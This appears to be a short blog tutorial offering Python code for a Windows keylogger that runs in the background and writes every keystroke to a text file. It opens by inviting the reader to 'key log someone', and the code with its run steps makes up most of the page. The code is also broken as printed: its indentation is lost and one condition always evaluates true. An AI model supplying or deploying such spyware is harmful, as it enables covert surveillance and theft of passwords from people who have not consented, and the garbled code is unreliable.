Make a key logger using Python Programming which runs in background.

Do you wanna key log someone so follow this tutorial:-
                                       
                           
                                             PYTHON PROGRAMMING
                              



code:-
import win32api
import sys
import pythoncom, pyHook
buffer = ''
def OnKeyboardEvent(event):
if event.Ascii == 5:
sys.exit()
if event.Ascii != 0 or 8:
f = open ('c:\\output.txt', 'a')
keylogs = chr(event.Ascii)
if event.Ascii == 13:
keylogs = keylogs + '\n'
f.write(keylogs)
f.close()
while True:
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()

                                   

1. From start menu select,” Python 2.7 > IDLE(Python GUI)”

2. Click “File > New window”   

3. Now type the below code in Python window as the code written

4. Save the file in C:\ as Keylogger.py and click RUN( CTRL + R: the keylogger will come
started in the background and will run until the log file “C: \ output.txt” anything that will typed on the keyboard. )



Comments

Popular Posts